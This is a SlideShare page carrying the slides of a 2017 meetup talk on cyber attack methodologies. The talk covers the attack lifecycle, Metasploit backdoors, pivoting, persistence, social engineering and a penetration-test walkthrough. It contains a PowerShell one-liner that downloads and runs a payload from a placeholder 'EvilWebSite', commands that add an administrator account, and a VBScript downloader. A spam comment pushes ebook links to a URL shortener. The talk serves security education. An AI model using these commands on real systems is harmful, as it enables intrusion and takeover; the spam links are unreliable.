Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

Cyber Attack Methodologies

1 146 vues

Publié le

Présentation aux Geeks Anonymes Liège par Frédéric De Pauw, le 29 novembre 2017

Publié dans : Internet
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Répondre 
    Voulez-vous vraiment ?  Oui  Non
    Votre message apparaîtra ici

Cyber Attack Methodologies

  1. 1. Cyber Attacks Methodologies 29-11-2017 Geeks Anonymes
  2. 2. 1. Objectives 2. Introduction 3. Cyber Attack Lifecycle 4. Vulnerabilities and Exploitation 5. Social Engineering and Advanced Persistent Threats 6. Example of a penetration test scenario 7. Conclusion
  3. 3. Introduction
  4. 4. Introduction  Frédéric De Pauw  Cyber Security specialist & ethical hacker Head Security Services @NRB Freelance Ethical Hacker (BE – LUX – US) https://be.linkedin.com/in/fdepauw
  5. 5. Introduction  What is Cyber Crime?  Computer crime, or cybercrime, is crime that involves a computer and a network  Two types of Cyber Crime:  Technology is the Target. Enterprise, State systems, personal systems  Technology is the Instrument. Criminal activities on Internet  This session is focused on the first type
  6. 6. Introduction Technology = Target Technology = instrument Distributed Deny of Service Pedopornography Hacking incitement to racial hatred Malwares, Ransomwares Incitement to terrorism Phishing Money Laundering Hacktivism Drug sell … Spam …
  7. 7. Introduction  Cyber Crime  Drastically evolved over the past years, following the global evolution of ICT supporting human activity  Allow cyber criminals to make profit equivalent as other types of criminality  Offers some advantages over other criminal activities: anonymity, discretion, borderless  Remain little fought and with no international legislation  Has evolved to cyber war with state-sponsored attacks  Will affect our life (connected cars, Operational Technologies, IOT)  Cost of Cyber Crime in Belgium: 3,5 billion Euros
  8. 8. Introduction Evolution of Cyber Crime S O P H I S T I C A T I O N 1985-1995 Entertainmen t First Worms Phone Hacking 2010-2017-… Hacktivism Virus Spread Website Defacement Organized Crime DDOS Company Systems Hacking Data Lead Industrial espionage Cyber War Targeted Attacks State-Sponsored Attacks
  9. 9. Introduction Cyber War – NSA Hacking Tools Leak (2017) 2. NSA Contractor installs trojan 3. NSA Contractor runs full scan 1. NSA Contractor has NSA Hacking tools on his PC 4. Kaspersky AV discovers malware + NSA hacking tools 5. Russian spies are somehow aware of the discovery of NSA tools Kaspersky Denies giving info 6. Russian Spies further Hack contractor PC
  10. 10. Introduction Cyber War – NSA Hacking Tools Leak
  11. 11. Introduction  Future of Cyber Crime  Intensification of targeted cyber attacks against enterprises with important impacts (financial, image..)  Predominance of Advanced Persistence Threats targeting the end user  99% of System Compromises will still use unpatched Vulnerabilities  Intensification of cyber war / cyber espionage activities between nations  Increase of cyber crime targeting connected objects and operational technologies  MIRA botnet – 2017  Hackable Cardiac devices – 2017  WIFI Baby Heat Monitor device -2017  Jeep SUV Hack - 2015
  12. 12. Introduction  Legal evolution  General Data Protection Regulation (GDPR) – adopted end of 2016 – comes into force 25 may 2018  Circulars of National Bank of Belgium  Regulation for financial sector  Data Breach notification standard  Within 72 hours  Fines in case of data leak  Max 4% of turnover, maximum 20 M€
  13. 13. Cyber Attack Life Cycle
  14. 14. Cyber Attack Lifecycle - Public Information - Social Networks - Vulnerability Scanning - Physical Observation 1 Reconnaissance 2 Initial Infection - Vulnerabilities - Virus / Malware - Social Engineering - Physical Intrusion 3 Gain Control 4 Privilege Escalation Control infected system 5 Lateral Movement Compromise more systems deeper in the network 7 Malicious Activities Data Exfiltration Hacking Websites Money Extortion ..Gain elevated privileges on the infected system 6 Persistence Maintain persistent connection with infected systems
  15. 15. Cyber Attack Lifecycle > Reconnaissance  Reconnaissance process is a key activity  Indeed, during this phase crucial information are obtained in order to perform a cyber attack  For instance, information will be used to determined the best attack vector to be used  Activities performed are:  Collect information concerning the target (websites, telephone numbers, general mailboxes..) through public information  Collect information through direct contact sur as phone calls (fake poll, job seeker..)  Collect technical information concerning the target information system (exposed systems, partners, data centers..)  Collect information on premises (garbage, WIFI scanning..)  Actively scan enterprise networks exposed on Internet
  16. 16. Cyber Attack Lifecycle > Reconnaissance
  17. 17. Cyber Attack Lifecycle > Reconnaissance  Following reconnaissance activities, attackers must have obtained enough information in order to determine best attack vectors in order to perform the initial infection phase  For instance:  Vulnerabilities infecting systems exposed on Internet  Lack of physical access to facilities  Social engineering attack on selected profiles from, for instance, social networks information
  18. 18. Cyber Attack Lifecycle > Initial Infection  Initial Infection is aimed at obtaining a first backdoor within the target information system  Vectors:  Exploiting a vulnerability affecting the victim’s system(s)  Infection through Virus / Malware  Exploiting a physical vulnerability
  19. 19. Cyber Attack Lifecycle > Initial Infection PerimeterPublic Cloud Private Cloud Corporate Network On Prem Applications Servers / Appliances Security Technology SAAS Applications Servers / Appliances Security Technology Corporate Applications Servers / Appliances Security Technology Corporate Applications Servers / Appliances Security Technology End Users
  20. 20. Cyber Attack Lifecycle > Initial Infection
  21. 21. Cyber Attack Lifecycle > Initial Infection  IDS/IPS Bypass  Encryption  Anti-Virus Bypass  Use simple Powershell as a dropper which fetches an encrypted payload over Internet  powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt '))  Unknown Viruses  Use Staging to decouple payload from initial dropper.  The dropper is injected directly into memory  Fileless malware infection  Firewall Bypass  Uses “reverse” connections which connect to the C&C  E.g. HTTPS passing through the Enterprise Proxy
  22. 22. Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Create Powershell Payload
  23. 23. Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Move Payload to evil Web Server
  24. 24. Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Create the « Dropper »
  25. 25. Cyber Attack Lifecycle > Initial Infection  Metasploit + SET (Social Engineering Toolkit)  Create a Meterpreter backdoor using SET for the Payload and Metasploit for the C&C server  Start the Listener
  26. 26. Cyber Attack Lifecycle > Gain Control  Once initial infection is performed, the objective is to get control over the machine.  For this a network connection must be established between the victim and the Command & Control Server  In general « reverse » connection is made to bypass inbound Firewall protection  Several techniques to bypass Outbound filtering (if present.)
  27. 27. Cyber Attack Lifecycle > Gain Control  Standard Enterprise security principles for Outbound filtering:  Default policy is to deny all outbound connections  Allowed outbound connections must go through a proxy  Outbound connections must conform to the expected protocol  Outbound connections must pass other checks as well.  Outbound filtering evasion techniques examples  Reverse HTTP and / or HTTPS traffic (without or with Proxy settings verification  Payload Staging over DNS by setting the payload into TXT Records of a Domain
  28. 28. Cyber Attack Lifecycle > Gain Control  Metasploit / Meterpreter  Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
  29. 29. Cyber Attack Lifecycle > Privilege Escalation  Escalate privileges from infected machines in order gain elevated access  Typical example is getting Administrator privileges  Several techniques  « Local Exploits » from local applications on the infected machine  Manual search for credentials in scripts  Password Hashes dump (e.g. SAM, /etc/passwd) and cracking  Authenticated Sessions grabbing (e.g. VPN Sessions)  LSASS Process Dump (MimiKatz)  SSH Keys  World Writeable files  Read command history files  Batches / Jobs alteration  Process Injection  Try injecting malicious code in processes running under « Domain Admin » privileged user
  30. 30. Cyber Attack Lifecycle > Privilege Escalation  Metasploit: « Incognito » module  Allows to impersonate authentication tokens on compromised windows hosts  Backdoor must run under « SYSTEM » or « Administrator » privilege in order to see interesting authentication tokens  TIP: File servers are virtual treasure troves of tokens since most file servers are used as network attached drives via domain logon scripts
  31. 31. Cyber Attack Lifecycle > Lateral Movement  From Infected systems, try to infect more systems deeper in the Network  Basically repeat the cyber Attack Lifecycle process (recon, initial infection, privilege escalation…)  Aim for high value systems, windows domain controllers, file servers..  Techniques  Credential re-use / pass-the-hash / SSH keys re-use  Internal applications vulnerabilities (less often patched)  Network segmentation issues between environments ( e.g. Port 445) – PsExec with Pass-The-Hash
  32. 32. Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems
  33. 33. Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Use Autoroute to make the compromised host a pivot to other networks
  34. 34. Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Scan the network through the route created on ports 139 & 445
  35. 35. Cyber Attack Lifecycle > Lateral Movement  Metasploit – Pivoting technique  Start a new session on a new host using PsExec and “Pass-The- Hash” technique re-using local Administrator password hash
  36. 36. Cyber Attack Lifecycle > Maintain Persistence  Prevent loss of connection between infected machines and the C&C  Techniques  Create jobs / schedule tasks  Create service running on startup  Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)  Bootkit / Rootkit  Default file association  Logon Scripts  Modification of Applications / Services  Registry RUN keys
  37. 37. Cyber Attack Lifecycle > Maintain Persistence  Metasploit / Persistence module  Create a Meterpreter service which will start when the compromised host boots
  38. 38. Cyber Attack Lifecycle > Maintain Persistence  Metasploit / Persistence module  Create a Meterpreter service which will start when the compromised host boots
  39. 39. Cyber Attack Lifecycle > Demo  Social Engineering scenario  Send a « Virus » to the victim which consists of a Metasploit Meterpreter instance  Undetected by up to date commercial antivirus 1. Prepare Malware & environment 2. Send Malware 3. Execute Malware 4. Get infected & Contact C&C 5. Interact
  40. 40. Vulnerabilities and Exploitation
  41. 41. Vulnerabilities and Exploitation  A vulnerability is a flaw in a system which allows a malicious user to compromise its Confidentiality, Integrity and / or its availability  Simple – Default Password. Complex – Buffer Overflow in an application  Dozens of new vulnerabilities officially classified everyday  http://www.cvedetails.com  Dozen of others are not disclosed!  0DAY – Vulnerabilities not discovered, or not disclosed  Vulnerabilities are discovered by  Researchers, students (Ethical Hackers)  Professional researchers ( Vulnerability Brokers )  http://www.zerodayinitiative.com/  France- Vupen Security – Sells vulnerabilities to NASA  Cyber Criminals( 0DAYS )
  42. 42. Vulnerabilities and Exploitation  Full Disclosure principle  Vulnerabilities are reported and published publicly as soon as discovered without taking into account that a patch is available  Responsible disclosure principle  Vendors are notified first  Vulnerability is publicly disclosed after 45 days  Websites with vulnerabilities and associated exploits  www.securityfocus.com  www.1337day.com (not free)  http://www.cvedetails.com/  http://www.exploit-db.com/  Underground Websites on TOR network  Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR) ccc.de (ALL), blackhat.com (US)
  43. 43. Vulnerabilities and Exploitation HTTPS://0day.today/
  44. 44. Vulnerabilities and Exploitation  Complexity of systems, applicative codes, communication flows, network segmentation  Out-of-the-box vulnerabilities of Vendor solutions, lack of security configuration  Next->Next->Next Syndrome  Lack of secure coding awareness  TOP 10 OWASP  Lack of enforcement for Security during IT Projects  Security implies Cost and Time  Need for functionality <-> Need for security  BlackList Mode  Learning Mode
  45. 45. Social Engineering and Advanced Persistent Threats
  46. 46. Human Vulnerabilities / Social Engineering Social engineering is the preferred attack vector as it is generally easier to bypass preventive security measures Targets can be the company employees but also partners / subcontractors Two types of social engineering: Human SE Technical SE
  47. 47. Human Vulnerabilities / Social Engineering Technical SE is aimed at compromising end user systems Transmission of the malware follows « authorized » routes, such as e- mail and/or web browsing Bypass security measures such as perimeter security, firewalls,.. 1. INFECTION 2. CONTROL
  48. 48. Human Vulnerabilities / Social Engineering Attack methodologies: Encourage users to install tools such as « TeamViewer » or « LogMeIn » Send malware through e-mail Word/Excel with malicious Macros PDF files exploiting PDF vulnerabilities Send mail containing links to malicious web sites Send Phishing SMS on Smartphones (SMShing) Drop USB Keys containing Viruses (STUXNET) USB Gadgets configured to simulate a Keyboard
  49. 49. Human Vulnerabilities / Social Engineering Nowadays systems are in general protected against USB Infection through autorun functionality New method -> « Hacker Interface Devices » Attackers embed malicious code within USB Gadgets Once connected, those gadgets simulate being a keyboard and start sending commands to the computer (Keystroke Injection) Those commands can drop a malware as easily as other techniques Ref: http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe USB Gadgets
  50. 50. Penetration test example
  51. 51. Penetration test example Context: Black Box Intrusion test. Scope: External- facing systems Web Servers Ports 80 (HTTP) et 443 (HTTPS) DMZ Intranet Domaine Windows d’EntrepriseInternal Network
  52. 52. Penetration test example VULN 1/2: Vulnerable deployment of SAP BO ( Apache Axis2 ) CVE-2010-0219 , Apache Axis2 Default Credentials http://www.securityfocus.com/bid/40343 , Apache Axis2 Directory traversal See earlier: Vuln « Directory Traversal » Vuln « Default Password » Allows to have admin credentials to Axis2
  53. 53. Penetration test example
  54. 54. Penetration test example Access to Axis2 administration allows to upload a Web Service and LIVE deployment of it
  55. 55. Penetration test example A metasploit module exists to exploit this vuln Axis2 / SAP BusinessObjects Authenticated Code Execution http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer We use it to deploy a reverse shell backdoor on the server to connect back to port 80 VULN 3: Servers is allowed to contact any host on Internet on port 80 and 443 Web Servers Ports 80 (HTTP) et 443 (HTTPS) DMZ Intranet Domaine Windows d’Entreprise C&C SERVER – PORT 80 Port 80 Internal Network
  56. 56. Penetration test example Not possible to upload a meterpreter (killed by AV on the machine) Possible to upload a backdoor which sends me back a DOS command prompt on the server
  57. 57. Penetration test example Next steps: Create privileged account on the server VULN 4: Application server is running under ADMIN privileges Net user temptest password /add Net localgroup Administrators hacked /add Obtain a Remote Desktop connection Problem: Port 3389 closed Inbound Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389 Web ServersC&C SERVER – PORT 80 Port 3389 SSH SERVER – PORT 443 Reverse SSH TUNNEL / Port 443
  58. 58. Penetration test example To create the tunnel, I need to download a SSH Client on the Server using DOS command prompt I create a VBSCRIPT script using « Echo » command, then execute the VBSCRIPT Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs Cscript dl.vbs Use plink to create the tunnel dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", "http://www.putty.com/plink.exe", False xHttp.Send with bStrm .type = 1 '//binary .open .write xHttp.responseBody .savetofile "c:tempplink.exe", 2 '//overwrite end with
  59. 59. Penetration test example Web ServersC&C SERVER – PORT 80 Port 3389 SSH SERVER – PORT 443 Reverse SSH TUNNEL / Port 443  Connect to RDP through the tunnel and use the user account I just created to connect temptest password
  60. 60. Penetration test example  Next Step -> Lateral Movement – the simplest first, credentials reuse  I need to crack all passwords present locally on the infected server  Vuln 6/7: Windows 2003 Design Vulnerabilities  VULN 6: « Repair » file contains a SAM backup file containing encrypted credentials using LMHASH  VULN: LMHASH encryption algorithm is broken and can be cracked easily
  61. 61. Penetration test example  After some minutes
  62. 62. Penetration test example  VULN 8: Local Administrator password is replicated over all systems in the DMZ Web ServersC&C SERVER – PORT 80 Port 3389 SSH SERVER – PORT 443 Reverse SSH TUNNEL / Port 443 Web Servers Web Servers Web Servers Port 3389
  63. 63. Penetration test example  Next-Step: Try to hit Internal Network  VULN 9 : DMZ Systems members of Internal Windows Domain. Means that critical ports ( e.g. 139, 445, … ) must be open between DMZ and Internal network  VULN 10 : Password Replication Bis – A Domain Admin user account whose name is identical has a local account has the same password
  64. 64. Penetration test example  I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and has full control over the Enterprise Domain Web Servers Ports 80 (HTTP) et 443 (HTTPS) DMZ Intranet Domaine Windows d’Entreprise Contrôleur de Domaine Domain Controller
  65. 65. Conclusion

×